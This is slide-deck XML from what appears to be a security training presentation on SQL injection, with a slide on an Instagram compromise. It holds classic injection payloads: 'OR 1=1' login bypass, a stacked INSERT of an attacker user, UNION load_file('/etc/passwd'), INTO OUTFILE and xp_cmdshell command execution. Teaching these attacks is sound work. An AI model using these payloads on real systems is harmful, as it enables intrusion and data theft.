                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>WHERE email = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>’ AND password = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1773" name="Google Shape;1773;p249"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388700" y="1606350"/>
            <a:ext cx="87078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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>SELECT * FROM users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>WHERE email = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>admin@duo.com’ OR 1=1--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>’ AND password =’none’;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1774" name="Google Shape;1774;p249"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1867075" y="2841500"/>
            <a:ext cx="4013400" cy="4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E06666"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>email =’admin@duo.com’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>OR 1=1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E06666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1775" name="Google Shape;1775;p249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="5894425" y="2876749"/>
            <a:ext cx="205800" cy="348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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318550" y="2889125"/>
            <a:ext cx="9459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BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>TRUE!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777" name="Google Shape;1777;p249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425500" y="2358788"/>
            <a:ext cx="195300" cy="348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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424350" y="3489850"/>
            <a:ext cx="2373300" cy="4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6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Congrats! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>You’re now logged in as admin@duo.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>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2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of SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1784" name="Google Shape;1784;p250"/>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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can log in as any user </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email = “admin@duo.com” OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND password = “none”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Logs in as the administrator</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can insert new users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM users WHERE email =”admin@duo.com”; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO users (email) VALUES (“attacker@evil.com”);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND password = “none”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inserts a new user into the users table</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="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43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7819800" cy="3416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a:t>Those 82 S3 buckets contained:</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Every user's photos</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Backups of all source code</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Read/write access for the Instagram homepage</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>SSL private keys for *.instagram.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>iOS and Android signing key</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Lots of API keys to various services</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;p1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Sensu Admin - Instagram Compromise</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1003" name="Google Shape;1003;p143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843789" y="2147460"/>
            <a:ext cx="2469924" cy="247295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51"/>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SzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can read arbitrary data from the filesystem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT email FROM users WHERE email = “admin@duo.com” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION ALL </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT load_file(‘/etc/passwd’)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="E06666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dumps the /etc/passwd file where the result of the query is displayed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can write arbitrary data to the filesystem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>email = “admin@duo.com” OR 1=1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE “/var/www/users.txt”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Writes the entire users table to a web accessible path</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1790" name="Google Shape;1790;p2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of SQLi</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2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 of SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1796" name="Google Shape;1796;p252"/>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a:t>Can even get shell access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT email FROM users WHERE email =”admin@duo.com”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION ALL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM EXEC xp_cmdshell ‘dir /Users/administrator/Documents/*’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dumps the contents the user’s home directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Even more powerful shell commands possible</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="3" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Add server users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="3" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable host based security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="3" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Download malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And last but not least: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Dump the database</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="9144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53"/>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 World Examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1802" name="Google Shape;1802;p253"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565400" y="1705850"/>
            <a:ext cx="4275600" cy="2862900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>10/2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - GoDaddy notes they had SQLi in their SQLi-prevention tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>10/2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
